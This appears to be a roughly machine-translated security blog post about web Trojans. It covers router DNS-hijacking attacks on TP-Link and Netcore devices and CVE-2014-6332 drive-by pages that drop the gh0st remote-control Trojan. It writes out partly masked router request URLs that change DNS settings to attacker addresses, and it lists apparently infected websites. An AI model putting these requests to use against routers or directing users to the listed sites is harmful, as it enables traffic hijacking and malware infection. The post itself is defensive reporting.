Network horse changes

Network horse changes

Webpage Trojans have always been a non-stop battlefield. Some Types of Trojans have been captured before, and a considerable part of them are discovered by embedding malicious code on the page, it is easy to seek out when the hosts with weak protection are accessed. The trojan author can perform subsequent operations to achieve ulterior motives.

According to the attack examples, there are many attacks targeting vrouters. Both vrouters of the tplink series and vrouters of the netcore series have suffered different types of attacks, this is mainly because of the firmware defects of the router. The following lists some of them:

1. For TPLINK series routers

1. Modify the DNS of the DHCP service. parameters: dnsserver and dnsserver2:

hxxp://XXX:XXX@192.168.1.1/XXX/XXXXXX.XXX?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=133.XXX.XXX.251&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6

2. Modify the DNS of the WAN port. parameters: dnsserver and dnsserver2:

hxxp://xxx:xxx@192.168.1.1/XXX/XXX.XXX?wan=0&lcpMru=1492&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=&dnsserver=122.xxx.xxx.93&dnsserver2=8.8.8.8&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Submit=%B1%A3+%B4%E6&Advanced=Advanced&btn_Submit=%B1%A3+%B4%E6

Ii. netcore series routers

1. Modify the DNS parameters of the DHCP service, such as dns1, dns2, and dns3:

hxxp://xxx:xxx@192.168.1.1/xxx/xxx.xxx?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1=192.168.1.2&dhcp_end_ip1=192.168.1.254&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1=133.xxx.xxx.251&dns2=8.8.8.8&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88

2. Modify the DNS parameters of the WAN port, dns1 and dns2:

hxxp://xxx:xxx@192.168.1.1/XXX/XXX.XXX?user=<user>&pass=<pass>&mac=<mac_current>&mac_clone_btn=MAC%E5%9C%B0%E5%9D%80%E5%85%8B%E9%9A%86&mac_def_btn2=%E6%81%A2%E5%A4%8D%E7%BC%BA%E7%9C%81MAC&mtu=<mtu>&up_bandwidth=<up_bandwidth>&down_bandwidth=<down_bandwidth>&work_mode_radio=ROUTE&work_mode=<work_mode>&isp_radio=AUTO&isp=<isp>&line_detect=<line_detect>&time=1&timer_enable=<timer_enable>&monday=1&tuesday=2&wednesday=3&thursday=4&friday=5&saturday=6&sunday=7&timer_day=<timer_day>&start_hour=<start_hour>&start_minute=<start_minute>&end_hour=<end_hour>&end_minute=<end_minute>&pppoe_conf_radio=MANU&out_time=<out_time>&pppoe_conf=MANU&server_name=<server_name>&ac_name=<ac_name>&dns1=<dns1>&dns2=<dns2>&submitbutton=%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88&uiname=<uiname>&connect_type=<connect_type>

 

 

 

However, with the upgrade of the product by the manufacturer, the effect of attacks such as routers began to decline. As a result, some Trojan writers began to turn to better exploitation methods. Recently, Microsoft recently disclosed the cve-2014-6332 and released the relevant patches, at the same time, the use of samples has been revealed online, leading to large-scale intrusion of the website Trojan. If the user does not install the latest patch locally, he or she is prone to attacks when accessing the website infected with Trojans, resulting in a zombie in the Trojan's hand ".

 

The iframe tag is used on the homepage of the website to embed html containing scripts.

 

When this vbs script is triggered, the browser will download the Remote Control Trojan Horse and implant it on the visitor's computer, it is known that browsers from IE3 to IE11 are affected.
Judging from the scope of attacks that have been captured, there are currently different levels of tampered pages in various industries across the country, or they are intentionally tampered with or infected with Trojans.
A very small part is listed below:

Http://www.99chg.com

Http: // 210.41.188.114: 8087/

Http: // 103.228.130.51

Http://www.987vv.com/

Http://www.51pkav.com/1.html

Http: // 113.10.169.69: 8080

Http://www.zseec.com/

Http://www.wanrenkao.com/fuck.htm

Most of them are pornographic sites.

A gh0st Remote Control Trojan is implanted on the visitor's computer, and the online protocol logo has not even changed.

 

Victim machines can be easily controlled by others, file uploading, screen control, or c & c attacks.
For this kind of "net horse", keep the security patch updated in a timely manner, at the same time to develop good surfing habits is very necessary, currently for CVE-2014-6332 such, 360 browser will also give the corresponding prompt: